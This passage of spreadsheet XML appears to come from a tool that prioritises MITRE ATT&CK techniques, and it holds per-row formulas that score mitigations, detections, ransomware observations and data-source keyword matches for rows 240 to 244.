        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K240">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L240">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M240" s="25">
        <v>0</v>
      </c>
      <c r="N240" s="51">
        <v>1</v>
      </c>
      <c r="O240" s="51">
        <v>2</v>
      </c>
      <c r="P240" s="51">
        <v>0</v>
      </c>
      <c r="Q240" s="51">
        <v>0</v>
      </c>
      <c r="R240" s="52" t="s">
        <v>100</v>
      </c>
      <c r="S240" s="51">
        <v>8</v>
      </c>
      <c r="T240" s="52" t="s">
        <v>448</v>
      </c>
      <c r="U240" s="51">
        <v>11</v>
      </c>
      <c r="V240" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.19523809523809527</v>
      </c>
      <c r="W240">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X240">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y240">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z240">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA240">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB240">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC240" s="29" t="s">
        <v>1010</v>
      </c>
      <c r="AD240" s="25" t="str" cm="1">
        <f t="array" ref="AD240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC240)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE240" s="25">
        <f>IF(AD240="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF240" s="25" t="str" cm="1">
        <f t="array" ref="AF240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC240)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG240" s="25">
        <f>IF(AF240="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH240" s="25" t="str" cm="1">
        <f t="array" ref="AH240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC240)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI240" s="25">
        <f>IF(AH240="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ240" s="25" t="str" cm="1">
        <f t="array" ref="AJ240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC240)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK240" s="25">
        <f>IF(AJ240="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL240" s="25" t="str" cm="1">
        <f t="array" ref="AL240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC240)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM240" s="25">
        <f>IF(AL240="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN240" s="52">
        <v>0</v>
      </c>
      <c r="AO240" s="51">
        <v>0</v>
      </c>
      <c r="AP240" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3420952380952385E-2</v>
      </c>
      <c r="AQ240" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11140317460317463</v>
      </c>
      <c r="AR240" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11140317460317463</v>
      </c>
      <c r="AS240" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT240" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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41" spans="1:47" ht="48">
      <c r="A241" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5369523809523802E-2</v>
      </c>
      <c r="B241" s="25">
        <f>SUM(H241,M241,V241)*(1+SUM(AE241,AG241,AI241,AK241,AM241))</f>
        <v>0.35369523809523806</v>
      </c>
      <c r="C241" s="25" t="s">
        <v>1028</v>
      </c>
      <c r="D241" s="25" t="s">
        <v>348</v>
      </c>
      <c r="E241" s="25" t="s">
        <v>1029</v>
      </c>
      <c r="F241" s="51">
        <v>1</v>
      </c>
      <c r="G241" s="51">
        <v>1</v>
      </c>
      <c r="H241" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I241">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J241">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K241">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L241">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M241" s="25">
        <v>0</v>
      </c>
      <c r="N241" s="51">
        <v>1</v>
      </c>
      <c r="O241" s="51">
        <v>19</v>
      </c>
      <c r="P241" s="51">
        <v>2</v>
      </c>
      <c r="Q241" s="51">
        <v>3</v>
      </c>
      <c r="R241" s="51"/>
      <c r="S241" s="51">
        <v>0</v>
      </c>
      <c r="T241" s="52" t="s">
        <v>1030</v>
      </c>
      <c r="U241" s="51">
        <v>8</v>
      </c>
      <c r="V241" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.19523809523809524</v>
      </c>
      <c r="W241">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>8</v>
      </c>
      <c r="X241">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.14545454545454545</v>
      </c>
      <c r="Y241">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.14545454545454545</v>
      </c>
      <c r="Z241">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>25</v>
      </c>
      <c r="AA241">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.25</v>
      </c>
      <c r="AB241">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.25</v>
      </c>
      <c r="AC241" s="29" t="s">
        <v>1031</v>
      </c>
      <c r="AD241" s="25" t="str" cm="1">
        <f t="array" ref="AD241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC241)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE241" s="25">
        <f>IF(AD241="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF241" s="25" t="str" cm="1">
        <f t="array" ref="AF241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC241)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG241" s="25">
        <f>IF(AF241="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH241" s="25" t="str" cm="1">
        <f t="array" ref="AH241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC241)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI241" s="25">
        <f>IF(AH241="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ241" s="25" t="str" cm="1">
        <f t="array" ref="AJ241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC241)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK241" s="25">
        <f>IF(AJ241="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL241" s="25" t="str" cm="1">
        <f t="array" ref="AL241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC241)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM241" s="25">
        <f>IF(AL241="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN241" s="60">
        <v>0</v>
      </c>
      <c r="AO241" s="51">
        <v>0</v>
      </c>
      <c r="AP241" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5369523809523802E-2</v>
      </c>
      <c r="AQ241" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11789841269841268</v>
      </c>
      <c r="AR241" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11789841269841268</v>
      </c>
      <c r="AS241" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT241" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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42" spans="1:47" ht="80.099999999999994">
      <c r="A242" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.20530000000000004</v>
      </c>
      <c r="B242" s="25">
        <f>SUM(H242,M242,V242)*(1+SUM(AE242,AG242,AI242,AK242,AM242))</f>
        <v>0.38633333333333336</v>
      </c>
      <c r="C242" s="25" t="s">
        <v>1032</v>
      </c>
      <c r="D242" s="25" t="s">
        <v>292</v>
      </c>
      <c r="E242" s="25" t="s">
        <v>1033</v>
      </c>
      <c r="F242" s="51">
        <v>1</v>
      </c>
      <c r="G242" s="51">
        <v>1</v>
      </c>
      <c r="H242" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I242">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J242">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K242">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L242">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M242" s="25">
        <v>0</v>
      </c>
      <c r="N242" s="51">
        <v>0</v>
      </c>
      <c r="O242" s="51">
        <v>0</v>
      </c>
      <c r="P242" s="51">
        <v>7</v>
      </c>
      <c r="Q242" s="51">
        <v>1</v>
      </c>
      <c r="R242" s="52" t="s">
        <v>1034</v>
      </c>
      <c r="S242" s="51">
        <v>5</v>
      </c>
      <c r="T242" s="52" t="s">
        <v>1035</v>
      </c>
      <c r="U242" s="51">
        <v>11</v>
      </c>
      <c r="V242" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.19047619047619049</v>
      </c>
      <c r="W242">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X242">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y242">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z242">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA242">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB242">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC242" s="29" t="s">
        <v>1036</v>
      </c>
      <c r="AD242" s="25" t="str" cm="1">
        <f t="array" ref="AD242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC242)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE242" s="25">
        <f>IF(AD242="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF242" s="25" t="str" cm="1">
        <f t="array" ref="AF242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC242)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG242" s="25">
        <f>IF(AF242="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH242" s="25" t="str" cm="1">
        <f t="array" ref="AH242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC242)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI242" s="25">
        <f>IF(AH242="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ242" s="25" t="str" cm="1">
        <f t="array" ref="AJ242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC242)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK242" s="25">
        <f>IF(AJ242="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL242" s="25" t="str" cm="1">
        <f t="array" ref="AL242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC242)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM242" s="25">
        <f>IF(AL242="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN242" s="52">
        <v>5</v>
      </c>
      <c r="AO242" s="51">
        <v>1</v>
      </c>
      <c r="AP242" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.20530000000000004</v>
      </c>
      <c r="AQ242" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1287777777777778</v>
      </c>
      <c r="AR242" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1287777777777778</v>
      </c>
      <c r="AS242" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT242" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU24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43" spans="1:47" ht="48">
      <c r="A243" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2881904761904765E-2</v>
      </c>
      <c r="B243" s="25">
        <f>SUM(H243,M243,V243)*(1+SUM(AE243,AG243,AI243,AK243,AM243))</f>
        <v>0.32881904761904768</v>
      </c>
      <c r="C243" s="25" t="s">
        <v>1037</v>
      </c>
      <c r="D243" s="25" t="s">
        <v>358</v>
      </c>
      <c r="E243" s="25" t="s">
        <v>1038</v>
      </c>
      <c r="F243" s="51">
        <v>1</v>
      </c>
      <c r="G243" s="51">
        <v>1</v>
      </c>
      <c r="H243" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I243">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J243">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K243">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L243">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M243" s="25">
        <v>0</v>
      </c>
      <c r="N243" s="51">
        <v>0</v>
      </c>
      <c r="O243" s="51">
        <v>0</v>
      </c>
      <c r="P243" s="51">
        <v>0</v>
      </c>
      <c r="Q243" s="51">
        <v>0</v>
      </c>
      <c r="R243" s="52" t="s">
        <v>1039</v>
      </c>
      <c r="S243" s="51">
        <v>9</v>
      </c>
      <c r="T243" s="51" t="s">
        <v>900</v>
      </c>
      <c r="U243" s="51">
        <v>11</v>
      </c>
      <c r="V243" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.19047619047619049</v>
      </c>
      <c r="W243">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>20</v>
      </c>
      <c r="X243">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Y243">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Z243">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA243">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB243">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC243" s="29" t="s">
        <v>1040</v>
      </c>
      <c r="AD243" s="25" t="str" cm="1">
        <f t="array" ref="AD243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC243)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE243" s="25">
        <f>IF(AD243="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF243" s="25" t="str" cm="1">
        <f t="array" ref="AF243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC243)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG243" s="25">
        <f>IF(AF243="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH243" s="25" t="str" cm="1">
        <f t="array" ref="AH243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC243)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI243" s="25">
        <f>IF(AH243="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ243" s="25" t="str" cm="1">
        <f t="array" ref="AJ243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC243)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK243" s="25">
        <f>IF(AJ243="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL243" s="25" t="str" cm="1">
        <f t="array" ref="AL243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC243)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM243" s="25">
        <f>IF(AL243="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN243" s="60">
        <v>0</v>
      </c>
      <c r="AO243" s="51">
        <v>0</v>
      </c>
      <c r="AP243" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2881904761904765E-2</v>
      </c>
      <c r="AQ243" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10960634920634922</v>
      </c>
      <c r="AR243" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10960634920634922</v>
      </c>
      <c r="AS243" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT243" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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44" spans="1:47" ht="32.1">
      <c r="A244" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4799047619047618E-2</v>
      </c>
      <c r="B244" s="25">
        <f>SUM(H244,M244,V244)*(1+SUM(AE244,AG244,AI244,AK244,AM244))</f>
        <v>0.34799047619047618</v>
      </c>
      <c r="C244" s="25" t="s">
        <v>1041</v>
      </c>
      <c r="D244" s="25" t="s">
        <v>88</v>
      </c>
      <c r="E244" s="25" t="s">
        <v>1042</v>
      </c>
      <c r="F244" s="51">
        <v>1</v>
      </c>
      <c r="G244" s="51">
        <v>1</v>
      </c>
      <c r="H244" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I244">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J244">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K244">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L244">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M244" s="25">
        <v>0</v>
      </c>
      <c r="N244" s="51">
        <v>0</v>
      </c>
      <c r="O244" s="51">
        <v>1</v>
      </c>
      <c r="P244" s="51">
        <v>1</v>
      </c>
      <c r="Q244" s="51">
        <v>0</v>
      </c>
      <c r="R244" s="52" t="s">
        <v>1043</v>
      </c>
      <c r="S244" s="51">
        <v>3</v>
      </c>
      <c r="T244" s="51" t="s">
        <v>1044</v>
      </c>
      <c r="U244" s="51">
        <v>16</v>
      </c>
      <c r="V244" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.19047619047619049</v>
      </c>
      <c r="W244">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X244">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y244">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z244">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA244">
